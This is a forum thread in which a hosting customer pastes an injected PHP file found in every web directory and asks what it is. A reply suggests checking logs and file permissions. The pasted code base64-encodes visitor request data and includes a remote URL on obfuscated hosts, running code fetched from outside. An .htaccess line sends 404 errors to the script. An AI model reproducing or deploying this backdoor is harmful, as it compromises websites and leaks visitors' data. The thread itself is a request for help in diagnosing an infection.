Unknown Files - Odd occuring

Baving

Hello,

I am currently baffled by something which is happening on a hosting account.

Files have been appearing in each sub-directory of public_html with the names 4504.php for example. The file contents are: -

<? 
error_reporting ;
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} ?>

The .htaccess files in the folders change aswell for example: -

Options -MultiViews
ErrorDocument 404 //radio/74539.php

I have never seen this before, the host of the server seems to think it is a PHP Injection. However it has done it before previously on another domain.

Has anyone seen it before or know what it is. Any help would be great :)

No idea off hand. Your going to have to look at your weblogs to see if anyone tries to access them files after injecting it etc.

Id say its one of your own scripts causing the above.

What are the permissions on the files? Does apache/web/www own them? What time were they created? You will have to do some digging on your side.

Sorry I cant be of any more help.

-steve

This thread is more than a year old. Please don't revive it unless you have something important to add.